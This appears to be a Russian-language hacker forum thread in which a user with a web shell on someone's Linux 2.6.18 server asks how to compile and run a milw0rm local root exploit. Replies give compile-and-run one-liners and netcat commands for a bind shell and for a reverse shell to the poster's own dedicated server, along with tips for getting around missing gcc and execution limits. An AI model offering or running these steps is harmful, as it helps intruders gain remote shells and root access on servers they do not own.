![]() |
Linux Kernel 2.6.18 vS Exploit
Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?
|
Попробуй
Код:
gcc -o sploit sploit.c; chmod +x sploit;./sploitКод:
gcc -o sploit sploit.c; chmod 777 sploit;./sploitКод:
gcc -o sploit sploit.c;./sploit |
Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.
|
тебе как минимум надо получить нормальный шелл
|
У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval()
PHP код:
|
Нужно сделать бекконнект или забиндить порт.
П.С. Или нет?=\ |
Цитата:
$ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута. Цитата:
Цитата:
|
which gcc cc cpp
бинди порт, например неткатом nc -l -p 31337 -e /bin/sh & потом у себя неткатом nc -v www.site.com 31337 Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла В ином случае делай бекконект у себя на дедике открываешь порт nc -l -p 31337 на сервер который собираешься рутать nc -v www.dedik.com 31337 -e /bin/sh & Удачи =) |
Нет факт что:
-- на хосте присутсвует gcc(мало вероятно); -- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc); Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много). |
AkyHa_MaTaTa, уж если ему не хватит прав на gcc, то ещё более вероятно что там noexec ;)
|
| Время: 10:52 |